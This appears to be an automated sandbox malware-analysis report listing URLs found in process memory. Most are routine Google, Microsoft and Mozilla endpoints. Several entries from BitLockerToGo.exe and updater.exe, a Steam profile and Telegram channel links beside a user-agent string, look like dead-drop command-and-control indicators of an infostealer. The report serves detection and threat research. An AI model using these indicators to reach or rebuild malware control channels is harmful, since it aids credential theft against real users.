Source: chrome.exe, 00000005.00000003.2596196297.000012B0012E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2595776933.000012B0015D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2596065846.000012B001598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2595839601.000012B00160C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2596769028.000012B001628000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 00000005.00000003.2596196297.000012B0012E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2595776933.000012B0015D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2596065846.000012B001598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2595839601.000012B00160C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2596769028.000012B001628000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chrome.exe, 00000005.00000002.2658718436.000012B000D8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569299542.000012B000910000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2660516148.000012B0012A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2657617956.000012B000AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658692972.000012B000D81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000005.00000002.2651650459.000012B0000A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658692972.000012B000D81000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2657266018.000012B0009D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000005.00000003.2569299542.000012B000910000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658692972.000012B000D81000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658749494.000012B000D98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000005.00000002.2658718436.000012B000D8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2660516148.000012B0012A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658692972.000012B000D81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000005.00000002.2658718436.000012B000D8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569299542.000012B000910000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2660516148.000012B0012A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658692972.000012B000D81000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658749494.000012B000D98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000005.00000002.2658718436.000012B000D8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569299542.000012B000910000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2654023977.000012B0002C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2660516148.000012B0012A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658692972.000012B000D81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000005.00000002.2658718436.000012B000D8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2569299542.000012B000910000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2660516148.000012B0012A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2657617956.000012B000AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658692972.000012B000D81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000005.00000002.2651650459.000012B0000A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658692972.000012B000D81000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658749494.000012B000D98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000005.00000002.2654763220.000012B0004C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: msedge.exe, 00000009.00000003.2690898690.000018A000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2691835525.000018A00026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.2800986263.00007D8800280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/AddSession
Source: msedge.exe, 00000009.00000003.2690898690.000018A000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2691835525.000018A00026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.2800986263.00007D8800280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/Logout
Source: msedge.exe, 0000000D.00000003.2800986263.00007D8800280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/LogoutYxAB
Source: msedge.exe, 00000009.00000003.2690898690.000018A000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2691835525.000018A00026C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
Source: msedge.exe, 00000009.00000003.2690898690.000018A000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2691835525.000018A00026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.2800986263.00007D8800280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/MergeSession
Source: msedge.exe, 00000009.00000003.2690898690.000018A000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2691835525.000018A00026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.2800986263.00007D8800280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/OAuthLogin
Source: msedge.exe, 00000009.00000003.2690898690.000018A000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2691835525.000018A00026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.2800986263.00007D8800280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
Source: msedge.exe, 00000009.00000003.2690898690.000018A000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2691835525.000018A00026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.2800986263.00007D8800280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
Source: msedge.exe, 00000009.00000003.2690898690.000018A000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2691835525.000018A00026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.2800986263.00007D8800280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
Source: msedge.exe, 00000009.00000003.2690898690.000018A000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2691835525.000018A00026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.2800986263.00007D8800280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
Source: msedge.exe, 00000009.00000003.2690898690.000018A000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2691835525.000018A00026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.2800986263.00007D8800280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
Source: msedge.exe, 00000009.00000003.2690898690.000018A000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2691835525.000018A00026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.2800986263.00007D8800280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
Source: msedge.exe, 00000009.00000003.2690898690.000018A000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2691835525.000018A00026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.2800986263.00007D8800280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
Source: msedge.exe, 00000009.00000003.2690898690.000018A000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2691835525.000018A00026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.2800986263.00007D8800280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
Source: msedge.exe, 00000009.00000003.2690898690.000018A000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2691835525.000018A00026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.2800986263.00007D8800280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
Source: chrome.exe, 00000005.00000002.2657021255.000012B000977000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2657176249.000012B0009A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2573080276.000012B000E30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000005.00000003.2576966972.000012B00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2576473521.000012B00041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2576752602.000012B001160000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chrome.exe, 00000005.00000002.2659732708.000012B000F1C000.00000004.00000800.00020000.00000000.sdmp, chromecache_451.7.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_450.7.dr	String found in binary or memory: https://plus.google.com
Source: chromecache_450.7.dr	String found in binary or memory: https://plus.googleapis.com
Source: chrome.exe, 00000005.00000002.2657176249.000012B0009A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2573080276.000012B000E30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000005.00000003.2600581308.000012B00170C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
Source: chrome.exe, 00000005.00000003.2600581308.000012B00170C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
Source: chrome.exe, 00000005.00000003.2600581308.000012B00170C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000005.00000003.2600581308.000012B00170C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
Source: chrome.exe, 00000005.00000003.2600581308.000012B00170C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000005.00000002.2651413420.000012B00008C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: 2cc80dabc69f58b6_1.14.dr	String found in binary or memory: https://sb.scorecardresearch.com/
Source: chrome.exe, 00000005.00000002.2651650459.000012B0000A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000005.00000002.2653297340.000012B0001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000005.00000003.2600581308.000012B00170C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.com2
Source: chrome.exe, 00000005.00000003.2600581308.000012B00170C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comJv
Source: chrome.exe, 00000005.00000003.2600581308.000012B00170C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comb
Source: chrome.exe, 00000005.00000002.2656199136.000012B000798000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2660125995.000012B001018000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2654763220.000012B0004C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2656230561.000012B0007B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000005.00000002.2656199136.000012B000798000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2660125995.000012B001018000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2654763220.000012B0004C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2656230561.000012B0007B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: 2cc80dabc69f58b6_1.14.dr	String found in binary or memory: https://srtb.msn.cn/
Source: 2cc80dabc69f58b6_1.14.dr	String found in binary or memory: https://srtb.msn.com/
Source: chrome.exe, 00000005.00000003.2580789480.000012B000294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: chrome.exe, 00000005.00000002.2654375078.000012B0003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2596196297.000012B0012E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2595776933.000012B0015D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2596769028.000012B001628000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: updater.exe, 00000000.00000002.2454538216.000000000BF16000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000000.00000002.2454538216.000000000C028000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000000.00000002.2454538216.000000000BDE0000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3089686713.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199825403037
Source: BitLockerToGo.exe, 00000003.00000002.3089686713.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199825403037oomaino5Mozilla/5.0
Source: BitLockerToGo.exe, 00000003.00000002.3095906196.000000000609C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: BitLockerToGo.exe, 00000003.00000002.3095906196.000000000609C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: BitLockerToGo.exe, 00000003.00000002.3090094818.0000000002E66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: BitLockerToGo.exe, 00000003.00000002.3090094818.0000000002E66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/A
Source: BitLockerToGo.exe, 00000003.00000003.2462259061.0000000002E99000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3090094818.0000000002E66000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2462187320.0000000002ED6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3089686713.0000000000400000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2478630340.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3090094818.0000000002E8B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2874398480.0000000002E86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/b4cha00
Source: BitLockerToGo.exe, 00000003.00000003.2462259061.0000000002E99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/b4cha00%D
Source: BitLockerToGo.exe, 00000003.00000002.3089686713.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/b4cha00oomaino5Mozilla/5.0
Source: chrome.exe, 00000005.00000002.2657266018.000012B0009D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000005.00000002.2653297340.000012B0001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tasks.googleapis.com/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.14.dr	String found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.14.dr	String found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.14.dr	String found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
Source: BitLockerToGo.exe, 00000003.00000003.2462259061.0000000002E99000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2462187320.0000000002ED6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3090094818.0000000002E8B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2874398480.0000000002E86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: chromecache_450.7.dr	String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: BitLockerToGo.exe, 00000003.00000002.3091820115.00000000058B3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3094935239.0000000005E7D000.00000004.00000020.00020000.00000000.sdmp, lxlxt0.3.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: BitLockerToGo.exe, 00000003.00000002.3091820115.00000000058B3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3094935239.0000000005E7D000.00000004.00000020.00020000.00000000.sdmp, lxlxt0.3.dr	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: BitLockerToGo.exe, 00000003.00000003.2873139264.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3091820115.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2874778329.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2654697420.000012B000498000.00000004.00000800.00020000.00000000.sdmp, oz5fcj.3.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000005.00000003.2576376283.000012B000BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2596932828.000012B000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2568720854.000012B000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2631006849.000012B000BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2657952507.000012B000BD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000005.00000003.2576376283.000012B000BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2596932828.000012B000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2568720854.000012B000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2631006849.000012B000BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2657952507.000012B000BD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000005.00000003.2576376283.000012B000BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2596932828.000012B000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2568720854.000012B000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2631006849.000012B000BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2657952507.000012B000BD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000005.00000003.2580789480.000012B000294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com
Source: chrome.exe, 00000005.00000002.2660242790.000012B0010E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2580789480.000012B000294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 00000005.00000003.2580789480.000012B000294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000005.00000003.2576797867.000012B000DA4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000005.00000002.2657875133.000012B000B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000005.00000002.2656272363.000012B0007D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/CharBl3
Source: chrome.exe, 00000005.00000002.2658107951.000012B000C28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 00000005.00000002.2658107951.000012B000C28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2ageHand
Source: chrome.exe, 00000005.00000002.2655645390.000012B0006E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/newtab_promos
Source: content_new.js.14.dr, content.js.14.dr	String found in binary or memory: https://www.google.com/chrome
Source: chrome.exe, 00000005.00000003.2600581308.000012B00170C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
Source: chrome.exe, 00000005.00000003.2600581308.000012B00170C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
Source: chrome.exe, 00000005.00000002.2653297340.000012B0001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2657021255.000012B000954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2656272363.000012B0007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2659765600.000012B000F38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000005.00000002.2653297340.000012B0001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2657021255.000012B000954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2656272363.000012B0007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2659765600.000012B000F38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: BitLockerToGo.exe, 00000003.00000003.2873139264.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3091820115.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2874778329.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3092709929.0000000005BDE000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655101941.000012B0005C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2654851711.000012B0004FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655745166.000012B000720000.00000004.00000800.00020000.00000000.sdmp, oz5fcj.3.dr, Web Data.14.dr, knyukx.3.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000005.00000002.2654375078.000012B0003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2596196297.000012B0012E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2595776933.000012B0015D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2596769028.000012B001628000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl=en&tab=ri&ogbl
Source: chrome.exe, 00000005.00000003.2596769028.000012B001628000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 00000005.00000003.2600581308.000012B00170C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 00000005.00000003.2576752602.000012B001160000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000005.00000002.2654763220.000012B0004C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000005.00000002.2657466444.000012B000A40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000005.00000002.2651137635.000012B00001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000005.00000003.2600581308.000012B00170C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/aida2
Source: chromecache_450.7.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_450.7.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chrome.exe, 00000005.00000003.2607443301.000012B0019C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
Source: chrome.exe, 00000005.00000003.2600581308.000012B00170C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 00000005.00000003.2600581308.000012B00170C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
Source: chrome.exe, 00000005.00000002.2653544521.000012B00020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000005.00000002.2653544521.000012B00020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000005.00000002.2653544521.000012B00020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000005.00000002.2653544521.000012B00020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000005.00000003.2580789480.000012B000294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
